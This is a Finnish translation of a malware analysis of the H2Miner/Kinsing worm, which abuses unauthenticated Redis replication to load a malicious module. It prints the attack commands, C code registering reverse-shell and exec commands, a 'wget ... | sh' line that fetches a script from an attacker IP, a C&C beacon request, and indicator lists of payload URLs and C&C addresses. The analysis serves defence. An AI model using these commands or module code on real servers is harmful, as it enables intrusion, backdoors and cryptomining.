Päivä sitten samanlainen mato hyökkäsi yhteen projektini palvelimista. Etsiessään vastausta kysymykseen "mikä se oli?" Löysin upean artikkelin Alibaba Cloud Security -tiimistä. Koska en löytänyt tätä artikkelia Habresta, päätin kääntää sen erityisesti sinulle <3
Merkintä
Äskettäin Alibaba Cloudin turvallisuustiimi havaitsi äkillisen H2Miner-epidemian. Tämäntyyppinen haitallinen mato käyttää Rediksen valtuutuksen puutetta tai heikkoja salasanoja yhdyskäytävänä järjestelmiisi, minkä jälkeen se synkronoi oman haitallisen moduulinsa orjan kanssa isäntä-orja-synkronoinnin avulla ja lataa lopuksi tämän haitallisen moduulin hyökättyyn koneeseen ja suorittaa haitallisen ohjeet.
Aiemmin järjestelmiäsi vastaan tehdyt hyökkäykset suoritettiin ensisijaisesti menetelmällä, joka sisälsi ajoitettuja tehtäviä tai SSH-avaimia, jotka kirjoitettiin koneellesi sen jälkeen, kun hyökkääjä oli kirjautunut Redisiin. Onneksi tätä menetelmää ei voi käyttää usein käyttöoikeuksien hallinnan ongelmien tai eri järjestelmäversioiden vuoksi. Tämä haitallisen moduulin lataustapa voi kuitenkin suorittaa hyökkääjän komennot suoraan tai päästä käsiksi komentotulkkiin, mikä on vaarallista järjestelmällesi.
Internetissä isännöityjen Redis-palvelimien suuren määrän (lähes miljoona) vuoksi Alibaba Cloudin tietoturvatiimi suosittelee ystävällisenä muistutuksena, että käyttäjät eivät jaa Redisiä verkossa ja tarkistavat säännöllisesti salasanojensa vahvuuden ja ovatko ne vaarantuneet. nopea valinta.
H2Miner
H2Miner on louhintabottiverkko Linux-pohjaisille järjestelmille, jotka voivat tunkeutua järjestelmääsi useilla tavoilla, mukaan lukien valtuutuksen puute Hadoop-langan, Dockerin ja Redisin etäkäskyn suorittamisen (RCE) haavoittuvuuksilla. Bottiverkko toimii lataamalla haitallisia komentosarjoja ja haittaohjelmia tietojen louhimiseksi, hyökkäyksen laajentamiseksi vaakatasossa ja komento- ja ohjausviestinnän ylläpitämiseksi.
Redis RCE
Pavel Toporkov jakoi tietoa tästä aiheesta ZeroNights 2018 -tapahtumassa. Version 4.0 jälkeen Redis tukee laajennuksen latausominaisuutta, joka antaa käyttäjille mahdollisuuden ladata C:llä käännetyt tiedostot Redikseen suorittaakseen tiettyjä Redis-komentoja. Vaikka tämä toiminto on hyödyllinen, se sisältää haavoittuvuuden, jossa isäntä-slave-tilassa tiedostot voidaan synkronoida orjan kanssa täyden uudelleensynkronoinnin kautta. Hyökkääjä voi käyttää tätä haitallisten tiedostojen siirtämiseen. Kun siirto on valmis, hyökkääjät lataavat moduulin hyökättyyn Redis-instanssiin ja suorittavat minkä tahansa komennon.
Haittaohjelmien matoanalyysi
Äskettäin Alibaba Cloud -tietoturvatiimi havaitsi, että H2Miner-haitallisen kaivosryhmän koko on yhtäkkiä kasvanut dramaattisesti. Analyysin mukaan yleinen hyökkäysprosessi on seuraava:
H2Miner käyttää RCE Redisiä täysimittaiseen hyökkäykseen. Hyökkääjät hyökkäävät ensin suojaamattomiin Redis-palvelimiin tai palvelimiin, joilla on heikko salasana.
Sitten he käyttävät komentoa config set dbfilename red2.so muuttaaksesi tiedoston nimeä. Tämän jälkeen hyökkääjät suorittavat komennon slaveof asettaaksesi master-slave-replikoinnin isäntäosoitteen.
Kun hyökätty Redis-ilmentymä muodostaa master-slave-yhteyden hyökkääjän omistamaan haitalliseen Redikseen, hyökkääjä lähettää tartunnan saaneen moduulin fullresync-komennolla tiedostojen synkronointiin. Red2.so-tiedosto ladataan sitten hyökkäyksen kohteena olevaan koneeseen. Hyökkääjät käyttävät sitten latausmoduulia ./red2.so ladatakseen tämän so-tiedoston. Moduuli voi suorittaa hyökkääjän komentoja tai käynnistää käänteisen yhteyden (takaoven) päästäkseen käsiksi hyökkäämään koneeseen.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Kun olet suorittanut haitallisen komennon, kuten / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, hyökkääjä nollaa varmuuskopiotiedoston nimen ja purkaa järjestelmämoduulin jälkien poistamiseksi. Red2.so-tiedosto säilyy kuitenkin hyökkäävässä koneessa. Käyttäjiä kehotetaan kiinnittämään huomiota tällaisen epäilyttävän tiedoston esiintymiseen Redis-esiintymän kansiossa.
Sen lisäksi, että hyökkääjä tappoi joitakin haitallisia prosesseja varastaakseen resursseja, hän seurasi haitallista komentosarjaa lataamalla ja suorittamalla haitallisia binaaritiedostoja . Tämä tarkoittaa, että prosessin nimi tai hakemiston nimi, joka sisältää kinsingin isännässä, voi osoittaa, että kone on saanut tämän viruksen tartunnan.
Reverse engineering -tulosten mukaan haittaohjelma suorittaa pääasiassa seuraavia toimintoja:
- Tiedostojen lataaminen ja niiden suorittaminen
- kaivostoiminta
- C&C-viestinnän ylläpito ja hyökkääjän komentojen suorittaminen
Käytä masscania ulkoiseen skannaukseen laajentaaksesi vaikutusvaltaasi. Lisäksi C&C-palvelimen IP-osoite on kovakoodattu ohjelmaan, ja hyökkäävä isäntä kommunikoi C&C-viestintäpalvelimen kanssa HTTP-pyyntöjen avulla, joissa zombie- (turvattu palvelin) -tiedot tunnistetaan HTTP-otsikossa.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Muut hyökkäysmenetelmät
Madon käyttämät osoitteet ja linkit
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
neuvosto
Ensinnäkin Rediksen ei pitäisi olla käytettävissä Internetistä, ja se tulee suojata vahvalla salasanalla. On myös tärkeää, että asiakkaat tarkistavat, ettei Redis-hakemistossa ole red2.so-tiedostoa ja että isäntäkoneen tiedoston/prosessin nimessä ei ole "kinsingiä".
Lähde: will.com